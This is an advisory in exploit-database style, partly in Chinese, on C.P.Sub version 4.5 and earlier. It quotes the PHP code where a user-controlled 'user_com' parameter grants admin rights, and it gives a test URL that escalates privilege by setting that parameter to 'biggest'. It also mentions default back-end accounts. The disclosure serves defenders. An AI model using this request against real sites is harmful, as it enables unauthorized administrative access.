#!/usr/bin/python # # 标题: C.P.Sub <= v4.5 Misconfiguration and Improper Authentication # Date: 2013/6/27 # 作者: Chako # 开发者: https://www.cooltey.org/ping/php.php # Software Download Link: https://cooltey.myweb.hinet.net/cpsub_v4.5.zip # Version: <= v4.5 # 测试系统: Windows 7 # ####################################################################   Improper Authentication: ==========================================   概述:     C.P.Sub <= v4.5 use "user_com=" parameter to identify if the user has admin privilege.     Therefore an attacker could simply change the value for "user_com=" parameter to gain admin privilege.     /check.php (LINE: 36-44) -------------------------------------------------------------- if($_GET[user_com] != "") {   $user_com = $_GET[user_com]; }elseif($_POST[user_com] != "") {   $user_com = $_POST[user_com]; } if($user_com == "biggest") { --------------------------------------------------------------     测试: --------------------------------------------------------------   change /info.php?cookie=yes&user_com=second   to https://Example_Target/info.php?cookie=yes&user_com=biggest       Misconfiguration ========================================== There are some default accounts for C.P.Sub <= v4.5 that allows an attacker to access back-end management page. It could lead to further attack.